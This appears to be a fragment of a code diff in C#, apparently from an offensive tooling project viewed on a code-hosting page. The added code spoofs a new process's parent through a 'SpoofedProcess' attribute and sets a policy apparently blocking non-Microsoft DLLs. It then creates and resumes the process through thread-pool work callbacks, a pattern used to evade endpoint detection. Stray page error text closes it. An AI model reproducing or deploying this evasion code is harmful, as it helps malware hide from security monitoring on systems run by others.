     1183 + attributeList.Attributes[0].Value = ImagePath.Buffer;
     1184 +
     1185 + attributeList.TotalLength = (UIntPtr)Marshal.SizeOf<PsAttributeList>();
     1186 + attributeList.Attributes[1].Attribute = 0x60000;
     1187 + attributeList.Attributes[1].Size = (UIntPtr)IntPtr.Size;
     1188 + attributeList.Attributes[1].Value = SpoofedProcess;
     1189 +
     1190 + IntPtr pValue = Marshal.AllocHGlobal(UIntPtr.Size);
     1191 + Marshal.WriteInt64(pValue, 0x100000000000 );
     1192 + attributeList.TotalLength = (UIntPtr)Marshal.SizeOf<PsAttributeList>();
     1193 + attributeList.Attributes[2].Attribute = 0x20010;
     1194 + attributeList.Attributes[2].Size = (UIntPtr)UIntPtr.Size;
     1195 + attributeList.Attributes[2].Value = pValue;
     1196 +
     1197 + IntPtr Work1 = IntPtr.Zero;
     1198 + TpAllocWork( out Work1, WorkCallback_CoreCreateParms, ref PtrZero, IntPtr.Zero );
     1199 + TpPostWork( Work1, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1200 + TpReleaseWork( Work1 );
     1201 + System.Threading.Thread.Sleep(500);
     1202 + IntPtr Work2 = IntPtr.Zero;
     1203 + TpAllocWork( out Work2, WorkCallback_CoreCreateProcess, ref PtrZero, IntPtr.Zero );
     1204 + TpPostWork( Work2, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1205 + TpReleaseWork( Work2 );
     1206 + System.Threading.Thread.Sleep(500);
     1207 + IntPtr Work3 = IntPtr.Zero;
     1208 + TpAllocWork( out Work3, WorkCallback_CoreResume, ref PtrZero, IntPtr.Zero );
     1209 + TpPostWork( Work3, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1210 + TpReleaseWork( Work3 );
     1211 + System.Threading.Thread.Sleep(500);
     1212 + IntPtr Work4 = IntPtr.Zero;
     1213 + TpAllocWork( out Work4, WorkCallback_CoreDestroyParms, ref PtrZero, IntPtr.Zero );
     1214 + TpPostWork( Work4, TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL );
     1215 + TpReleaseWork( Work4 );
     1216 +
     1217 + }
     1218 + }
     1219 +}
     1220 + 
Please wait...
Page is in error, reload to recover